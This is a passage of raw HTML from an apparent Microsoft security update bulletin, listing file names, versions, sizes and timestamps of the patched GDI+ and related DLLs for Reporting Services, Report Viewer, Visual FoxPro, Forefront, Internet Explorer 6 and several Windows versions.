class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">microsoft.reportingservices.processing.dll</td><td class=\"sbody-td\">8.0.1062.0</td><td class=\"sbody-td\">1331200</td><td class=\"sbody-td\">4-Aug-08</td><td class=\"sbody-td\">22:01</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">reportingserviceslibrary.dll</td><td class=\"sbody-td\">8.0.1062.0</td><td class=\"sbody-td\">557056</td><td class=\"sbody-td\">4-Aug-08</td><td class=\"sbody-td\">22:01</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">reportingservicesnativeclient.dll</td><td class=\"sbody-td\">2000.80.1062.0</td><td class=\"sbody-td\">38912</td><td class=\"sbody-td\">4-Aug-08</td><td class=\"sbody-td\">22:01</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">reportingservicesnativeserver.dll</td><td class=\"sbody-td\">2000.80.1062.0</td><td class=\"sbody-td\">48640</td><td class=\"sbody-td\">4-Aug-08</td><td class=\"sbody-td\">22:01</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">reportingservicessqlsortwrapper.dll</td><td class=\"sbody-td\">2000.80.1062.0</td><td class=\"sbody-td\">1120256</td><td class=\"sbody-td\">4-Aug-08</td><td class=\"sbody-td\">22:01</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">reportingserviceswebserver.dll</td><td class=\"sbody-td\">8.0.1062.0</td><td class=\"sbody-td\">503808</td><td class=\"sbody-td\">4-Aug-08</td><td class=\"sbody-td\">22:01</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">reportingserviceswebuserinterface.dll</td><td class=\"sbody-td\">8.0.1062.0</td><td class=\"sbody-td\">770048</td><td class=\"sbody-td\">4-Aug-08</td><td class=\"sbody-td\">22:01</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">rsclientprint.cab</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">1110000</td><td class=\"sbody-td\">4-Aug-08</td><td class=\"sbody-td\">22:02</td><td class=\"sbody-td\">Not applicable</td></tr></table></div><h3 class=\"sbody-h3\">File information for Microsoft Report Viewer</h3><span>The English (United States) version of this security update has the file attributes (or later file attributes) that are listed in the following table. The dates and times for these files are listed in Coordinated Universal Time (UTC). When you view the file information, it is converted to local time. To find the difference between UTC and local time, use the <strong class=\"uiterm\">Time Zone</strong> tab in the <strong class=\"uiterm\">Date and Time</strong> item in Control Panel. </span><h4 class=\"sbody-h4\">For Microsoft Report Viewer Redistributable 2005 SP1</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File Name</th><th class=\"sbody-th\">Version</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Size</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Microsoft.ReportViewer.Common.dll</td><td class=\"sbody-td\">8.0.50727.1843</td><td class=\"sbody-td\">04-Jul-2008</td><td class=\"sbody-td\">06:53</td><td class=\"sbody-td\">3,624,960</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Microsoft.ReportViewer.ProcessingObjectModel.dll</td><td class=\"sbody-td\">8.0.50727.1843</td><td class=\"sbody-td\">04-Jul-2008</td><td class=\"sbody-td\">06:53</td><td class=\"sbody-td\">49,152</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Microsoft.ReportViewer.WebForms.dll</td><td class=\"sbody-td\">8.0.50727.1843</td><td class=\"sbody-td\">04-Jul-2008</td><td class=\"sbody-td\">06:53</td><td class=\"sbody-td\">540,672</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Microsoft.ReportViewer.WinForms.dll</td><td class=\"sbody-td\">8.0.50727.1843</td><td class=\"sbody-td\">04-Jul-2008</td><td class=\"sbody-td\">06:53</td><td class=\"sbody-td\">339,968</td></tr></table></div><h4 class=\"sbody-h4\">For Microsoft Report Viewer Redistributable 2008</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File Name</th><th class=\"sbody-th\">Version</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Size</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Microsoft.ReportViewer.Common.dll</td><td class=\"sbody-td\">9.0.21022.142</td><td class=\"sbody-td\">15-Jul-2008</td><td class=\"sbody-td\">20:16</td><td class=\"sbody-td\">3,649,536</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Microsoft.ReportViewer.ProcessingObjectModel.dll</td><td class=\"sbody-td\">9.0.21022.142</td><td class=\"sbody-td\">15-Jul-2008</td><td class=\"sbody-td\">20:16</td><td class=\"sbody-td\">53,248</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Microsoft.ReportViewer.WebForms.dll</td><td class=\"sbody-td\">9.0.21022.142</td><td class=\"sbody-td\">15-Jul-2008</td><td class=\"sbody-td\">20:16</td><td class=\"sbody-td\">1,810,432</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Microsoft.ReportViewer.WinForms.dll</td><td class=\"sbody-td\">9.0.21022.142</td><td class=\"sbody-td\">15-Jul-2008</td><td class=\"sbody-td\">20:16</td><td class=\"sbody-td\">339,968</td></tr></table></div><h3 class=\"sbody-h3\">File information for Microsoft Visual FoxPro</h3><span>The English (United States) version of this security update has the file attributes (or later file attributes) that are listed in the following table. The dates and times for these files are listed in Coordinated Universal Time (UTC). When you view the file information, it is converted to local time. To find the difference between UTC and local time, use the <strong class=\"uiterm\">Time Zone</strong> tab in the <strong class=\"uiterm\">Date and Time</strong> item in Control Panel. </span><h4 class=\"sbody-h4\">For Visual FoxPro 8.0 Service Pack 1</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File Name</th><th class=\"sbody-th\">Version</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Size</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Gdiplus.dll</td><td class=\"sbody-td\">5.1.3102.3352</td><td class=\"sbody-td\">15-Apr-2008</td><td class=\"sbody-td\">17:54</td><td class=\"sbody-td\">1,724,416</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Gdiplus.dll</td><td class=\"sbody-td\">5.1.3102.3352</td><td class=\"sbody-td\">15-Apr-2008</td><td class=\"sbody-td\">17:54</td><td class=\"sbody-td\">1,724,416</td></tr></table></div><h4 class=\"sbody-h4\">For Visual FoxPro 9.0 Service Pack 1</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File Name</th><th class=\"sbody-th\">Version</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Size</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Gdiplus.dll</td><td class=\"sbody-td\">5.1.3102.3352</td><td class=\"sbody-td\">15-Apr-2008</td><td class=\"sbody-td\">17:54</td><td class=\"sbody-td\">1,724,416</td></tr></table></div><h4 class=\"sbody-h4\">For Visual FoxPro 9.0 Service Pack 2</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File Name</th><th class=\"sbody-th\">Version</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Size</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Gdiplus.dll</td><td class=\"sbody-td\">5.1.3102.3352</td><td class=\"sbody-td\">15-Apr-2008</td><td class=\"sbody-td\">17:54</td><td class=\"sbody-td\">1,724,416</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Gdiplus.dll</td><td class=\"sbody-td\">5.1.3102.3352</td><td class=\"sbody-td\">15-Apr-2008</td><td class=\"sbody-td\">17:54</td><td class=\"sbody-td\">1,724,416</td></tr></table></div><h3 class=\"sbody-h3\">File information for Microsoft Forefront Client Security</h3><span>The English (United States) version of this security update has the file attributes (or later file attributes) that are listed in the following table. The dates and times for these files are listed in Coordinated Universal Time (UTC). When you view the file information, it is converted to local time. To find the difference between UTC and local time, use the <strong class=\"uiterm\">Time Zone</strong> tab in the <strong class=\"uiterm\">Date and Time</strong> item in Control Panel. </span><h4 class=\"sbody-h4\">For Forefront Client Security</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">File version</th><th class=\"sbody-th\">File size</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Platform</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Gdiplus.dll</td><td class=\"sbody-td\">5.2.3790.4278</td><td class=\"sbody-td\">1,732,608</td><td class=\"sbody-td\">24-Apr-2008</td><td class=\"sbody-td\">06:16</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Gdiplus.man</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">397</td><td class=\"sbody-td\">24-Apr-2008</td><td class=\"sbody-td\">06:18</td><td class=\"sbody-td\">Not Applicable</td></tr></table></div><h3 class=\"sbody-h3\">File information for Windows and for Internet Explorer 6 SP1</h3><span>The English (United States) version of this security update has the file attributes (or later file attributes) that are listed in the following table. The dates and times for these files are listed in Coordinated Universal Time (UTC). When you view the file information, it is converted to local time. To find the difference between UTC and local time, use the <strong class=\"uiterm\">Time Zone</strong> tab in the <strong class=\"uiterm\">Date and Time</strong> item in Control Panel. </span><h4 class=\"sbody-h4\">Microsoft Internet Explorer 6</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">File version</th><th class=\"sbody-th\">File size</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Platform</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iecustom.dll</td><td class=\"sbody-td\">6.0.2800.1585</td><td class=\"sbody-td\">43,984</td><td class=\"sbody-td\">13-Oct-2006</td><td class=\"sbody-td\">20:50</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Vgx.dll</td><td class=\"sbody-td\">6.0.2800.1612</td><td class=\"sbody-td\">2,290,688</td><td class=\"sbody-td\">29-Apr-2008</td><td class=\"sbody-td\">14:22</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iecustom.dll</td><td class=\"sbody-td\">6.0.2800.1585</td><td class=\"sbody-td\">43,984</td><td class=\"sbody-td\">13-Oct-2006</td><td class=\"sbody-td\">20:50</td><td class=\"sbody-td\">x86</td></tr></table></div><h4 class=\"sbody-h4\">Windows XP, 32-bit versions</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">File version</th><th class=\"sbody-th\">File size</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Platform</th><th class=\"sbody-th\">SP requirement</th><th class=\"sbody-th\">Service branch</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Gdiplus.dll</td><td class=\"sbody-td\">5.1.3102.3352</td><td class=\"sbody-td\">1,724,416</td><td class=\"sbody-td\">15-Apr-2008</td><td class=\"sbody-td\">17:54</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\ASMS\\10\\MSFT\\WINDOWS\\GDIPLUS</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Gdiplus.man</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">397</td><td class=\"sbody-td\">19-Dec-2008</td><td class=\"sbody-td\">18:08</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\ASMS\\10\\MSFT\\WINDOWS\\GDIPLUS</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Gdiplus.man</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">605</td><td class=\"sbody-td\">19-Dec-2008</td><td class=\"sbody-td\">18:08</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\ASMS\\10\\POLICY\\MSFT\\WINDOWS\\GDIPLUS</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Gdiplus.dll</td><td class=\"sbody-td\">5.1.3102.5581</td><td class=\"sbody-td\">1,724,416</td><td class=\"sbody-td\">15-Apr-2008</td><td class=\"sbody-td\">17:47</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE\\ASMS\\10\\MSFT\\WINDOWS\\GDIPLUS</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Gdiplus.man</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">397</td><td class=\"sbody-td\">19-Dec-2008</td><td class=\"sbody-td\">18:02</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE\\ASMS\\10\\MSFT\\WINDOWS\\GDIPLUS</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Gdiplus.man</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">605</td><td class=\"sbody-td\">19-Dec-2008</td><td class=\"sbody-td\">18:02</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE\\ASMS\\10\\POLICY\\MSFT\\WINDOWS\\GDIPLUS</td></tr></table></div><h4 class=\"sbody-h4\">Windows Server 2003 and Windows XP, 64-bit versions</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">File version</th><th class=\"sbody-th\">File size</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Platform</th><th class=\"sbody-th\">SP requirement</th><th class=\"sbody-th\">Service branch</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Gdiplus.dll</td><td class=\"sbody-td\">5.2.3790.3126</td><td class=\"sbody-td\">2,883,584</td><td class=\"sbody-td\">29-Jan-2009</td><td class=\"sbody-td\">17:15</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP1</td><td class=\"sbody-td\">SP1QFE\\ASMS\\10\\MSFT\\WINDOWS\\GDIPLUS</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Gdiplus.man</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">399</td><td class=\"sbody-td\">29-Jan-2009</td><td class=\"sbody-td\">17:15</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">SP1</td><td class=\"sbody-td\">SP1QFE\\ASMS\\10\\MSFT\\WINDOWS\\GDIPLUS</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Gdiplus.man</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">609</td><td class=\"sbody-td\">29-Jan-2009</td><td class=\"sbody-td\">17:15</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">SP1</td><td class=\"sbody-td\">SP1QFE\\ASMS\\10\\POLICY\\MSFT\\WINDOWS\\GDIPLUS</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Gdiplus.dll</td><td class=\"sbody-td\">5.2.3790.3126</td><td class=\"sbody-td\">1,732,608</td><td class=\"sbody-td\">29-Jan-2009</td><td class=\"sbody-td\">17:15</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP1</td><td class=\"sbody-td\">SP1QFE\\ASMS\\X86\\10\\MSFT\\WINDOWS\\GDIPLUS</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Gdiplus.man</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">397</td><td class=\"sbody-td\">29-Jan-2009</td><td class=\"sbody-td\">17:15</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">SP1</td><td class=\"sbody-td\">SP1QFE\\ASMS\\X86\\10\\MSFT\\WINDOWS\\GDIPLUS</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Gdiplus.man</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">605</td><td class=\"sbody-td\">29-Jan-2009</td><td class=\"sbody-td\">17:15</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">SP1</td><td class=\"sbody-td\">SP1QFE\\ASMS\\X86\\10\\POLICY\\MSFT\\WINDOWS\\GDIPLUS</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Gdiplus.dll</td><td class=\"sbody-td\">5.2.3790.4278</td><td class=\"sbody-td\">2,883,584</td><td class=\"sbody-td\">29-Jan-2009</td><td class=\"sbody-td\">17:43</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\ASMS\\10\\MSFT\\WINDOWS\\GDIPLUS</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Gdiplus.man</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">399</td><td class=\"sbody-td\">29-Jan-2009</td><td class=\"sbody-td\">17:43</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\ASMS\\10\\MSFT\\WINDOWS\\GDIPLUS</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Gdiplus.man</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">609</td><td class=\"sbody-td\">29-Jan-2009</td><td class=\"sbody-td\">17:43</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\ASMS\\10\\POLICY\\MSFT\\WINDOWS\\GDIPLUS</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Gdiplus.dll</td><td class=\"sbody-td\">5.2.3790.4278</td><td class=\"sbody-td\">1,732,608</td><td class=\"sbody-td\">29-Jan-2009</td><td class=\"sbody-td\">17:43</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\ASMS\\X86\\10\\MSFT\\WINDOWS\\GDIPLUS</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Gdiplus.man</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">397</td><td class=\"sbody-td\">29-Jan-2009</td><td class=\"sbody-td\">17:43</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\ASMS\\X86\\10\\MSFT\\WINDOWS\\GDIPLUS</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Gdiplus.man</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">605</td><td class=\"sbody-td\">29-Jan-2009</td><td class=\"sbody-td\">17:43</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\ASMS\\X86\\10\\POLICY\\MSFT\\WINDOWS\\GDIPLUS</td></tr></table></div><h4 class=\"sbody-h4\">Windows Server 2003, 32-bit versions</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">File version</th><th class=\"sbody-th\">File size</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Platform</th><th class=\"sbody-th\">SP requirement</th><th class=\"sbody-th\">Service branch</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Gdiplus.dll</td><td class=\"sbody-td\">5.2.3790.3126</td><td class=\"sbody-td\">1,732,608</td><td class=\"sbody-td\">24-Apr-2008</td><td class=\"sbody-td\">05:37</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP1</td><td class=\"sbody-td\">SP1QFE\\ASMS\\10\\MSFT\\WINDOWS\\GDIPLUS</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Gdiplus.man</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">397</td><td class=\"sbody-td\">24-Apr-2008</td><td class=\"sbody-td\">05:38</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">SP1</td><td class=\"sbody-td\">SP1QFE\\ASMS\\10\\MSFT\\WINDOWS\\GDIPLUS</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Gdiplus.man</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">605</td><td class=\"sbody-td\">24-Apr-2008</td><td class=\"sbody-td\">05:38</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">SP1</td><td class=\"sbody-td\">SP1QFE\\ASMS\\10\\POLICY\\MSFT\\WINDOWS\\GDIPLUS</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Gdiplus.dll</td><td class=\"sbody-td\">5.2.3790.4278</td><td class=\"sbody-td\">1,732,608</td><td class=\"sbody-td\">24-Apr-2008</td><td class=\"sbody-td\">06:16</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\ASMS\\10\\MSFT\\WINDOWS\\GDIPLUS</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Gdiplus.man</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">397</td><td class=\"sbody-td\">24-Apr-2008</td><td class=\"sbody-td\">06:18</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\ASMS\\10\\MSFT\\WINDOWS\\GDIPLUS</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Gdiplus.man</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">605</td><td class=\"sbody-td\">24-Apr-2008</td><td class=\"sbody-td\">06:18</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\ASMS\\10\\POLICY\\MSFT\\WINDOWS\\GDIPLUS</td></tr></table></div><h4 class=\"sbody-h4\">Windows Server 2003, Itanium-based versions</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">File version</th><th class=\"sbody-th\">File size</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Platform</th><th class=\"sbody-th\">SP requirement</th><th class=\"sbody-th\">Service branch</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Gdiplus.dll</td><td class=\"sbody-td\">5.2.3790.3126</td><td class=\"sbody-td\">5,287,936</td><td class=\"sbody-td\">29-Jan-2009</td><td class=\"sbody-td\">17:00</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">SP1</td><td class=\"sbody-td\">SP1QFE\\ASMS\\10\\MSFT\\WINDOWS\\GDIPLUS</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Gdiplus.man</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">398</td><td class=\"sbody-td\">29-Jan-2009</td><td class=\"sbody-td\">17:00</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">SP1</td><td class=\"sbody-td\">SP1QFE\\ASMS\\10\\MSFT\\WINDOWS\\GDIPLUS</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Gdiplus.man</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">607</td><td class=\"sbody-td\">29-Jan-2009</td><td class=\"sbody-td\">17:00</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">SP1</td><td class=\"sbody-td\">SP1QFE\\ASMS\\10\\POLICY\\MSFT\\WINDOWS\\GDIPLUS</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Gdiplus.dll</td><td class=\"sbody-td\">5.2.3790.3126</td><td class=\"sbody-td\">1,732,608</td><td class=\"sbody-td\">29-Jan-2009</td><td class=\"sbody-td\">17:00</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP1</td><td class=\"sbody-td\">SP1QFE\\ASMS\\X86\\10\\MSFT\\WINDOWS\\GDIPLUS</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Gdiplus.man</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">397</td><td class=\"sbody-td\">29-Jan-2009</td><td class=\"sbody-td\">17:00</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">SP1</td><td class=\"sbody-td\">SP1QFE\\ASMS\\X86\\10\\MSFT\\WINDOWS\\GDIPLUS</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Gdiplus.man</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">605</td><td class=\"sbody-td\">29-Jan-2009</td><td class=\"sbody-td\">17:00</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">SP1</td><td class=\"sbody-td\">SP1QFE\\ASMS\\X86\\10\\POLICY\\MSFT\\WINDOWS\\GDIPLUS</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Gdiplus.dll</td><td class=\"sbody-td\">5.2.3790.4278</td><td class=\"sbody-td\">5,288,448</td><td class=\"sbody-td\">29-Jan-2009</td><td class=\"sbody-td\">17:34</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\ASMS\\10\\MSFT\\WINDOWS\\GDIPLUS</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Gdiplus.man</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">398</td><td class=\"sbody-td\">29-Jan-2009</td><td class=\"sbody-td\">17:34</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\ASMS\\10\\MSFT\\WINDOWS\\GDIPLUS</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Gdiplus.man</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">607</td><td class=\"sbody-td\">29-Jan-2009</td><td class=\"sbody-td\">17:34</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\ASMS\\10\\POLICY\\MSFT\\WINDOWS\\GDIPLUS</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Gdiplus.dll</td><td class=\"sbody-td\">5.2.3790.4278</td><td class=\"sbody-td\">1,732,608</td><td class=\"sbody-td\">29-Jan-2009</td><td class=\"sbody-td\">17:34</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\ASMS\\X86\\10\\MSFT\\WINDOWS\\GDIPLUS</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Gdiplus.man</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">397</td><td class=\"sbody-td\">29-Jan-2009</td><td class=\"sbody-td\">17:34</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\ASMS\\X86\\10\\MSFT\\WINDOWS\\GDIPLUS</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Gdiplus.man</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">605</td><td class=\"sbody-td\">29-Jan-2009</td><td class=\"sbody-td\">17:34</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\ASMS\\X86\\10\\POLICY\\MSFT\\WINDOWS\\GDIPLUS</td></tr></table></div><h4 class=\"sbody-h4\">Windows Server 2008 and Windows Vista, 32-bit versions</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">File version</th><th class=\"sbody-th\">File size</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Platform</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Gdiplus.dll</td><td class=\"sbody-td\">5.2.6000.16683</td><td class=\"sbody-td\">1,744,896</td><td class=\"sbody-td\">30-Apr-2008</td><td class=\"sbody-td\">05:24</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Gdiplus.dll</td><td class=\"sbody-td\">5.2.6000.20826</td><td class=\"sbody-td\">1,744,896</td><td class=\"sbody-td\">01-May-2008</td><td class=\"sbody-td\">03:16</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Gdiplus.dll</td><td class=\"sbody-td\">5.2.6001.18065</td><td class=\"sbody-td\">1,748,992</td><td class=\"sbody-td\">30-Apr-2008</td><td class=\"sbody-td\">05:27</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Gdiplus.dll</td><td class=\"sbody-td\">5.2.6001.22170</td><td class=\"sbody-td\">1,748,992</td><td 